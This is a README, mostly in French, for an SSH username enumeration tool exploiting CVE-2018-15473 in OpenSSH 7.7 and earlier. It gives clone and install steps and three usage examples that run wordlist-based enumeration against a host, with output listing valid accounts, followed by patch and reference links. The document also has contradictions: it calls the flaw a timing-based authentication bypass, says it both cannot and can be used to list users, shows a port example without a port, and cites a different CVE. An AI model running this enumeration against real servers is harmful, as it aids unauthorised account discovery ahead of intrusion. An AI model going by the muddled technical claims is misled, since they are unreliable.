
Outil d'énumération de noms d'utilisateur SSH exploitant CVE-2018-15473 pour identifier les utilisateurs valides sur les serveurs OpenSSH via un contournement d'authentification basé sur le timing.
Le serveur OpenSSH ne retarde pas le traitement d'un utilisateur invalide avant d'avoir complètement analysé le paquet contenant la requête. Cette vulnérabilité est liée à auth2-gss.c, auth2-hostbased.c, auth2-pubkey.c.
Bien que cette vulnérabilité ne puisse pas être utilisée pour générer une liste d'utilisateurs valides, elle peut néanmoins être utilisée pour énumérer et deviner des noms d'utilisateurs.
OpenSSH <= 7.7
openssh-7.8p1-1.fc28 openssh-7.6p1-6.fc27
Vous devrez peut-être installer le paquet openssl-dev équivalent de votre distribution.
# 注意:如果您在kali上安装,则可以跳过pip安装,只需执行下面第一二三行的步骤,因为paramiko已经存在。
git clone https://github.com/1stPeak/CVE-2018-15473.git
cd CVE-2018-15473
chmod u+x ssh-username-enum.py
pip install -r requirements.txt
# 或者使用以下命令下载安装
pipenv install -r requirements.txt # if you're cool like that
chmod u+x ssh-username-enum.py
Exemple 1 : Énumération d'un seul utilisateur
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -u root 192.168.1.2
[+] root found!
Exemple 2 : Énumération de plusieurs utilisateurs avec 10 threads (threads par défaut : 4)
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2
[+] man found!
[+] guest found!
[+] nobody found!
[!] SSH negotiation failed for user nobody4.
[+] lpadmin found!
etc.
Exemple 3 : Adresse IPv6 avec port SSH spécifié
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2 '::1'
[+] ROOT found!
[+] syslog found!
[+] sslh found!
[!] SSH negotiation failed for user sssd.
[+] rfindd found!
[+] ultra found!
etc.
Il est recommandé aux utilisateurs de mettre à jour vers une version non affectée. Le projet OpenBSD a publié un correctif source au lien suivant : https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
https://github.com/epi052/cve-2018-15473
http://blog.nsfocus.net/openssh-cve-2018-15919/